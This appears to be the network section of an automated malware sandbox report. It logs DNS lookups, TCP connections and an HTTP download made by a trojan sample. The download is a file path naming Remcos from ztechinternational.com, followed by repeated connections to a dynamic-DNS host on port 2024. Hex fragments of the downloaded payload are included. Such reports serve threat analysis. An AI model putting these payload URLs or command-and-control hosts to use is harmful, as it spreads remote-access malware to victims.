Jun 7, 2021 20:45:20.086798906 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086821079 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086831093 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086846113 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086854935 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086872101 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086880922 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086896896 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086906910 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086920977 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086927891 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086949110 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086957932 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.086975098 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.086977005 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087012053 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087022066 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087038040 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087048054 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087061882 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087070942 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087088108 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087105989 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087125063 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087131977 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087153912 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087166071 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087179899 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087198019 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087204933 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087225914 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087229013 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087249994 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087258101 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087268114 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087285042 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087296963 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087310076 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087322950 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087337017 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.087354898 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.087368965 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.246901989 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.246942043 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.246982098 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.246988058 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247015953 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247019053 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247029066 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247059107 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247061014 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247100115 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247154951 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247211933 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247251034 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247286081 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247314930 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247339010 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247339964 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247374058 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247404099 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247489929 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247533083 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247788906 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247814894 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247848034 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247854948 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247890949 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247914076 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247920990 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247926950 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247950077 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.247963905 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.247978926 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248012066 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248025894 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248049021 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248071909 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248076916 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248106003 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248110056 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248132944 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248141050 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248151064 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248168945 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248179913 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248198032 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248208046 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248233080 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248236895 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248267889 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248297930 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248307943 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248318911 CEST	80	49756	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:20.248343945 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:20.248369932 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:22.381994963 CEST	49756	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:31.668188095 CEST	49761	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:34.681407928 CEST	49761	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:40.681935072 CEST	49761	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:53.835108995 CEST	49762	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:45:56.823940992 CEST	49762	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:02.824549913 CEST	49762	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:16.011951923 CEST	49763	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:19.013330936 CEST	49763	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:25.029443979 CEST	49763	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:38.180748940 CEST	49764	2024	192.168.2.6	172.94.125.152
Jun 7, 2021 20:46:41.187120914 CEST	49764	2024	192.168.2.6	172.94.125.152

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2021 20:42:27.059772968 CEST	64267	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:27.103975058 CEST	53	64267	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:28.126388073 CEST	49448	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:28.170967102 CEST	53	49448	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:29.056590080 CEST	60342	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:29.100231886 CEST	53	60342	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:30.134119034 CEST	61346	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:30.176605940 CEST	53	61346	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:31.448030949 CEST	51774	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:31.490524054 CEST	53	51774	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:32.434293032 CEST	56023	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:32.477134943 CEST	53	56023	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:33.460597992 CEST	58384	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:33.503323078 CEST	53	58384	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:34.419742107 CEST	60261	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:34.462224960 CEST	53	60261	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:35.367039919 CEST	56061	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:35.409394979 CEST	53	56061	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:37.839397907 CEST	58336	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:37.881587029 CEST	53	58336	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:38.976092100 CEST	53781	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:39.020881891 CEST	53	53781	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:40.216075897 CEST	54064	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:40.259056091 CEST	53	54064	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:41.320555925 CEST	52811	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:41.362912893 CEST	53	52811	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:42.368067980 CEST	55299	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:42.410609007 CEST	53	55299	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:43.526990891 CEST	63745	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:43.570085049 CEST	53	63745	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:44.783766985 CEST	50055	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:44.828049898 CEST	53	50055	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:46.033189058 CEST	61374	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:46.075520039 CEST	53	61374	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:47.285466909 CEST	50339	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:47.328111887 CEST	53	50339	8.8.8.8	192.168.2.6
Jun 7, 2021 20:42:48.417357922 CEST	63307	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:42:48.460304976 CEST	53	63307	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:00.354979992 CEST	49694	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:00.407907963 CEST	53	49694	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:22.286176920 CEST	54982	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:22.330776930 CEST	53	54982	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:33.364975929 CEST	50010	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:33.458831072 CEST	53	50010	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:34.407449961 CEST	63718	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:34.530824900 CEST	53	63718	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:35.098205090 CEST	62116	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:35.141453981 CEST	53	62116	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:35.168903112 CEST	63816	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:35.268287897 CEST	53	63816	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:35.776992083 CEST	55014	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:35.819999933 CEST	53	55014	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:36.431745052 CEST	62208	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:36.565550089 CEST	53	62208	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:37.215694904 CEST	57574	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:37.259170055 CEST	53	57574	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:37.349425077 CEST	51818	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:37.402235985 CEST	53	51818	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:37.729406118 CEST	56628	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:37.829976082 CEST	53	56628	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:38.589009047 CEST	60778	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:38.633724928 CEST	53	60778	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:39.739865065 CEST	53799	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:39.784301043 CEST	53	53799	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:40.892893076 CEST	54683	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:40.976972103 CEST	53	54683	8.8.8.8	192.168.2.6
Jun 7, 2021 20:43:42.672722101 CEST	59329	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:43:42.717361927 CEST	53	59329	8.8.8.8	192.168.2.6
Jun 7, 2021 20:44:13.445609093 CEST	64021	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:44:13.505254030 CEST	53	64021	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:07.588278055 CEST	56129	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:07.758765936 CEST	53	56129	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:07.818758011 CEST	58177	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:07.863574028 CEST	53	58177	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:09.373864889 CEST	50700	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:09.424510956 CEST	53	50700	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:19.333503008 CEST	54069	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:19.376274109 CEST	53	54069	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:31.601393938 CEST	61178	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:31.667457104 CEST	53	61178	8.8.8.8	192.168.2.6
Jun 7, 2021 20:45:53.789323092 CEST	57017	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:45:53.833571911 CEST	53	57017	8.8.8.8	192.168.2.6
Jun 7, 2021 20:46:15.892798901 CEST	56327	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:46:16.001064062 CEST	53	56327	8.8.8.8	192.168.2.6
Jun 7, 2021 20:46:38.136794090 CEST	50243	53	192.168.2.6	8.8.8.8
Jun 7, 2021 20:46:38.179811001 CEST	53	50243	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 7, 2021 20:43:35.098205090 CEST	192.168.2.6	8.8.8.8	0x5409	Standard query (0)	ztechinternational.com	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:07.588278055 CEST	192.168.2.6	8.8.8.8	0x9bee	Standard query (0)	ztechinternational.com	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:07.818758011 CEST	192.168.2.6	8.8.8.8	0xb3e7	Standard query (0)	ztechinternational.com	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:09.373864889 CEST	192.168.2.6	8.8.8.8	0xda30	Standard query (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:19.333503008 CEST	192.168.2.6	8.8.8.8	0xb1ba	Standard query (0)	ztechinternational.com	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:31.601393938 CEST	192.168.2.6	8.8.8.8	0x6cc	Standard query (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:53.789323092 CEST	192.168.2.6	8.8.8.8	0x9d50	Standard query (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	A (IP address)	IN (0x0001)
Jun 7, 2021 20:46:15.892798901 CEST	192.168.2.6	8.8.8.8	0x49f3	Standard query (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	A (IP address)	IN (0x0001)
Jun 7, 2021 20:46:38.136794090 CEST	192.168.2.6	8.8.8.8	0x8b5c	Standard query (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 7, 2021 20:43:35.141453981 CEST	8.8.8.8	192.168.2.6	0x5409	No error (0)	ztechinternational.com	192.185.113.219	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:07.758765936 CEST	8.8.8.8	192.168.2.6	0x9bee	No error (0)	ztechinternational.com	192.185.113.219	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:07.863574028 CEST	8.8.8.8	192.168.2.6	0xb3e7	No error (0)	ztechinternational.com	192.185.113.219	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:09.424510956 CEST	8.8.8.8	192.168.2.6	0xda30	No error (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:19.376274109 CEST	8.8.8.8	192.168.2.6	0xb1ba	No error (0)	ztechinternational.com	192.185.113.219	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:31.667457104 CEST	8.8.8.8	192.168.2.6	0x6cc	No error (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	A (IP address)	IN (0x0001)
Jun 7, 2021 20:45:53.833571911 CEST	8.8.8.8	192.168.2.6	0x9d50	No error (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	A (IP address)	IN (0x0001)
Jun 7, 2021 20:46:16.001064062 CEST	8.8.8.8	192.168.2.6	0x49f3	No error (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	A (IP address)	IN (0x0001)
Jun 7, 2021 20:46:38.179811001 CEST	8.8.8.8	192.168.2.6	0x8b5c	No error (0)	hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu	172.94.125.152	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ztechinternational.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49732	192.185.113.219	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Timestamp	kBytes transferred	Direction	Data
Jun 7, 2021 20:43:35.357248068 CEST	1403	OUT	GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: ztechinternational.com Cache-Control: no-cache
Jun 7, 2021 20:43:35.553634882 CEST	1412	IN	HTTP/1.1 200 OK Date: Mon, 07 Jun 2021 18:43:35 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Last-Modified: Sun, 06 Jun 2021 21:56:00 GMT Accept-Ranges: bytes Content-Length: 131136 Content-Type: application/octet-stream Data Raw: 50 2c b3 d2 5c 70 c4 73 b1 00 63 3a 7f 34 b0 da 59 59 73 a7 a2 aa d4 09 01 d4 f5 b0 f1 99 d5 8a e3 7f 62 2a 08 44 a5 2b 07 cf 73 d0 22 fa 29 cf ca f9 ec 43 ea 15 dc d9 72 c3 ae e4 a5 7b b5 2d 3f 6e 4a fa 24 28 dc 55 24 9e ab 9b 90 1b 23 fb 58 ec 8a 60 6e 54 94 7f 98 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 48 19 ef 15 d0 cc 4e 4b 62 f2 7d a7 50 40 5a 8d 59 e2 94 eb 3c 19 ab 57 fa f7 a3 cb 61 91 c7 ee ee 29 a2 ab 70 e7 dc 27 2c e7 ba 4f c7 9d d9 cd 22 fd 92 64 1c 67 1d 42 27 f1 76 24 c3 83 93 5a 16 5f 35 fe 24 35 d1 d5 50 df 36 6f 3a 5d fc 04 44 fa 9d ae 75 35 e4 c3 6e 2e c2 7f 16 56 1f 5b 92 c5 65 1a 02 1f ef 25 4e 2d fe 5b d0 8a 65 59 5e 74 95 e8 d3 a2 a6 cb 9f 6d 8e c6 f9 9c a1 7c 68 3b 0a 7a b2 98 44 da 98 a5 32 53 a5 d7 c3 84 38 a2 5d 1b 89 09 1d 32 9d 56 31 cd 51 4c 75 99 1e 20 e2 8e 9d 47 29 61 db 91 43 dd 35 6a c2 9d ba 20 2b 50 fb 9b 79 c2 a9 09 2f bc bb eb 2c 94 09 4d 03 2e 9e 6b c5 c0 10 be 94 8c f9 e3 b6 4b f1 8d 20 af 7c 90 9c c7 a7 22 4a eb 63 0b 66 df 14 93 e1 c7 5a f0 0c c1 a9 e5 f2 35 b1 3d 49 0e e3 4e ea d1 35 4d 6a 64 e3 dc 5a 41 3f 06 33 ac 53 14 bf 79 ca 85 c1 69 74 66 5c d7 f2 90 ff 67 14 2f e9 c1 7f 7b f1 b0 c9 06 2b db ba 6d 66 e2 fd b3 22 37 8e 0e 0a 4f 89 fd 1f f9 70 5e 15 58 f5 40 96 2f 59 7a 14 cf 2b 2a d9 ea 31 2f bc ee dc ec 41 22 1e 59 ef 71 1a 71 74 e0 c5 ef 58 b9 93 63 71 8e ee d3 89 64 83 49 59 3f 55 1f 89 75 59 23 83 6c b4 ab cd e8 9e 02 63 33 cf fd 77 e9 a9 27 06 5d 4b af b2 6f 78 44 ab 85 98 45 ab 75 6f 8f ba f2 a8 84 13 77 ab 2b 14 68 61 cc ad bb 31 17 6e 32 d0 6f 82 87 4f 7f 09 a3 56 7d 95 fb f6 bb b8 da 27 38 52 8b cc 26 9b 8a c3 00 43 cb a0 58 3c 4c 65 b4 de f4 c3 55 75 fd 2c 5e 3e 5d b1 6c 97 44 b2 d4 b1 0d 02 43 fd 5e cb 0a e8 63 8c b0 4b 67 71 fb a7 a5 5b cf 6e d1 9e 63 65 ee 75 b3 79 d1 29 ea c7 b7 bb 88 ed ea 7e 98 f1 10 d8 af 11 e3 e0 79 60 6b 57 95 21 17 e8 0a 20 bc 47 94 e5 ef 81 ee a3 73 45 03 6d 98 74 5f 48 ca a8 4a 84 dc e3 c3 60 0a 16 c7 46 6d 2c 3d cb e3 85 c5 50 e9 42 92 66 66 dc bf f0 6f e0 1a 12 3e 43 f5 34 7b 3c 0f 0c f8 a9 61 9b de 20 ab 7b bd 07 e2 94 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 e3 7f c3 80 c1 06 93 8c 18 51 6c e5 66 dd 02 9f 6b 57 42 d3 9b b4 56 5c 65 d1 1c 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 14 01 44 70 6f 81 a8 86 db 67 6d 38 28 05 f3 a9 dc b5 f6 32 37 14 d0 86 e0 ef 33 4c 9d 49 2e 16 2c b6 18 52 b3 a4 39 ac 38 ef 71 a2 4f 9b 03 bb 5e 1e 25 97 bb ff 16 96 ea 26 55 88 34 e9 97 1b a2 fb 0b 10 c3 70 77 c3 bd 02 ef c3 c2 7b a2 b9 49 c4 4b ae 15 d3 a5 9f 3e 1d d7 87 3f 73 fd 0b 5f ae f1 ea 9b 65 d1 8d ea 32 e6 78 59 22 39 57 0f d0 59 56 a1 1e 20 da 5c 78 a1 ff 1a 59 2f 2e 1c 5f f3 3c 4f 5f 94 d5 d1 a8 36 4e 6f e7 d9 37 c5 3b 6e 48 58 f0 da a6 dc df 3e c0 1f 4f 6f 55 9e 31 df d6 fc 5c a5 5c 9a 08 25 f9 22 17 e8 b2 05 78 ff 1d da 72 34 da fa 27 28 dc 55 20 9e ab 9b 6f e4 23 fb e0 ec 8a 60 6e 54 94 7f d8 6b f0 7a f0 0b d8 28 78 c9 a8 b4 55 5b cf c4 22 ff 29 62 94 71 45 b1 99 e8 60 8d b6 27 bd dc 32 03 4f 47 b0 19 ef 15 de d3 f4 45 62 46 74 6a 71 f8 5b c1 94 c3 c0 83 55 6a 8b 27 88 98 c4 b9 00 fc e7 8d 8f 47 cc c4 04 c7 be 42 0c 95 cf 21 e7 f4 b7 ed 66 b2 c1 44 71 08 79 27 09 fc 7b 2e e7 83 93 5a 16 5f 35 fe 40 49 56 6c 70 c2 df 85 1a 40 15 ee 64 e7 74 44 18 0b 10 29 4f 33 2b 95 65 68 ef b1 b0 d8 8c Data Ascii: P,\psc:4YYsbD+s")Cr{-?nJ$(U$#X`nTkz(xU[")bqE`'2OGHNKb}P@ZY<Wa)p',O"dgB'v$Z_5$5P6o:]Du5n.V[e%N-[eY^tm\|h;zD2S8]2V1QLu G)aC5j +Py/,M.kK \|"JcfZ5=IN5MjdZA?3Syitf\g/{+mf"7Op^X@/Yz+1/A"YqqtXcqdIY?UuY#lc3w']KoxDEuow+ha1n2oOV}'8R&CX<LeUu,^>]lDC^cKgq[nceuy)~y`kW! GsEmt_HJ`Fm,=PBffo>C4{<a {8I6QlfkWBV\et}"Dpogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"xr4'(U o#`nTkz(xU[")bqE`'2OGEbFtjq[Uj'GB!fDqy'{.Z_5@IVlp@dtD)O3+eh
Jun 7, 2021 20:43:35.553683043 CEST	1413	IN	Data Raw: f0 22 02 06 cf 61 30 17 b1 8b 8b 80 b3 7f 69 7c 02 70 a3 41 21 bb 70 67 2c 31 9e 42 96 43 26 e3 90 7a 9a a9 30 bc b8 db b9 e7 d5 39 6e 17 bf b4 f1 a9 14 f5 d8 f2 4a d8 27 c9 57 9a 73 3f 3d 0b 64 55 45 cb 8b e5 8c aa 37 67 03 a1 f5 9a 3d c2 ba fb Data Ascii: "a0i\|pA!pg,1BC&z09nJ'Ws?=dUE7g=y/,EL.QK.wbKcf5mHN5]jdZA;3Syitf\g?{+mv"7Op^X@/Yz+*^A"q"}tXcq
Jun 7, 2021 20:43:35.553711891 CEST	1414	IN	Data Raw: 04 03 0c f8 a9 b1 9a de 20 bb 7b bd 07 22 95 1e 38 9d 49 b1 e7 fa 36 be 08 ab eb 11 a3 7f c3 c0 ef 74 f6 e0 77 32 6c e5 8a fb 02 9f 6b b7 43 d3 9b 84 56 5c 65 01 1d 74 d6 7d dd 8e 8e a2 fa a0 22 8e 1f b7 54 01 44 32 6f 81 a8 86 db 67 6d 38 28 05 Data Ascii: {"8I6tw2lkCV\et}"TD2ogm8(273LI.,R98qO^%&U4pw{IK>?s_e2xY"9WYV \xY/._<O_6No7;nHX>OoU1\\%"
